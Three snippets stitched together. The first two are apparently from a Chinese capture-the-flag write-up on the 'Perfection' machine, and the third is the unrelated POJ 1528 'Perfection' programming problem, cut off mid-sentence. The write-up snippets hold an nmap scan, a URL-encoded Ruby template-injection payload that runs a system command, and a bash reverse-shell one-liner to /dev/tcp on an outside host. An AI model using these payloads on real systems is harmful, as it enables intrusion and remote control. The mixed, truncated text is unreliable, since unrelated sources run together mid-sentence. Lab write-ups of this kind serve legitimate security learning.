端口 打开了ssh和http服务 访问 Perfection靶机的网站 是一个根据权重计算总成绩的网站 Wappalyzer查看网页用的什么编写搭建的 抓包看一下是怎么工作的 发送,，返回的结果 如果我在 类别 后面多加一句命令 就会出现提示  恶意输入阻止 大概率有命令注入 通过插件知道用的ruby语言 存在SSTI(模板注入漏洞） SSTI (Se

Main $ nmap -sV -sC 10.10.11.253 --min-rate 1000 使用Ruby开发的,尝试Ruby的SSTI注入 x%0a<%25%3Dsystem("ping+-c1+10.10.16.23");%25> $ echo "/bim/bash -i >& /dev/tcp/10.10.16.23/10032 0>&1"|base64 categ

题目：http://poj.org/problem?id=1528 Perfection Time Limit: 1000MS Memory Limit: 10000KTotal Submissions: 11909 Accepted: 5595 Description From the article Number Theory in the 1994 Microso